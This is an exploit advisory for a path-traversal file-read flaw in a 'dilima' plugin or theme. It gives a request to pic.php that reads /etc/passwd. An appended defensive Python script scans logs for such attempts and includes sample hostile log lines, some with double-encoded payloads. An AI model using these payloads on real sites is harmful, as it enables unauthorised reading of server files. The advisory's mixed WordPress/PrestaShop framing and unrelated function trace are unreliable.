
Wordpress Plugin Mega stor - Local File Inclusion

Posted on 30 November -0001

# Exploit Title: Wordpress Plugin Mega stor - Local File Inclusion
# Software Link: https://null24.net/themeforest-dilima-v1-0-mega-store-responsive-prestashop-theme/
# Date : April 16, 2016
# Tested : on windows 7
# Author : mohamed naji
# Personal contact: facebook.com/moohamed.naji
==============================================================
introduction:

Dilima Prestashop theme is built to match with multipurpose store, especially oriented with fully responsive as it works on any device (includes laptop, tablet, smartphone etc). This theme will be a great solution for online digital store, gifts store, fashion store or shop kids clothing and baby clothes…
===========================================================
vulnerability in function compilefile() :
⇑
$this->compilefile ($in, $out) // lessc.inc.php :
⇓
function checkedcompile($in, $out) :
⇓
function checkedcompile($in, $out) requires: :
if(!is_file($out) || filemtime($in) > filemtime($out))

/wp-content/plugins/dilima/pic.php?url=../../../etc/passwd

thnx to : Xanonymous - Ayoub -
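A defender-side check for the request pattern shown in the advisory, added here as an example (not code from the advisory or the plugin): it scans access-log lines for requests to pic.php whose url parameter resolves outside its starting directory, undoing repeated percent-encoding and Windows backslashes first. The log lines are constructed samples and the function names are hypothetical.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

TARGET_PATH = "/wp-content/plugins/dilima/pic.php"  # endpoint named in the advisory
PARAM = "url"                                        # parameter named in the advisory
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Constructed access-log lines for illustration (not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [16/Apr/2016:10:00:01 +0000] "GET /wp-content/plugins/dilima/pic.php?url=img/banner.png HTTP/1.1" 200 5120',
    '198.51.100.7 - - [16/Apr/2016:10:00:05 +0000] "GET /wp-content/plugins/dilima/pic.php?url=../../../etc/passwd HTTP/1.1" 200 1377',
    '198.51.100.7 - - [16/Apr/2016:10:00:09 +0000] "GET /wp-content/plugins/dilima/pic.php?url=%252e%252e%255c%252e%252e%255c%252e%252e%255cetc%255cpasswd HTTP/1.1" 200 1377',
    '203.0.113.9 - - [16/Apr/2016:10:01:02 +0000] "GET /wp-content/plugins/dilima/pic.php?url=img/../img/a.png HTTP/1.1" 200 900',
]


def fully_decode(value, rounds=5):
    """Percent-decode repeatedly so double-encoded input (%252e) is seen in clear."""
    for _ in range(rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value


def escapes_base(value):
    """True if the path is absolute or resolves above the directory it starts in."""
    path = fully_decode(value).replace("\\", "/")
    if path.startswith("/") or re.match(r"[A-Za-z]:", path):
        return True
    norm = posixpath.normpath(path)
    return norm == ".." or norm.startswith("../")


def suspicious_requests(log_lines):
    """Return (line_number, decoded_value) for traversal attempts against TARGET_PATH."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        target = urlsplit(match.group(1)) if match else None
        if target is None or fully_decode(target.path).lower() != TARGET_PATH:
            continue
        for value in parse_qs(target.query).get(PARAM, []):
            if escapes_base(value):
                hits.append((number, fully_decode(value)))
    return hits


if __name__ == "__main__":
    print(*suspicious_requests(SAMPLE_LOG), sep="\n")
```

The same escapes_base logic, applied server-side to the resolved path before any file is opened, is the corresponding input check for the url parameter.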

 
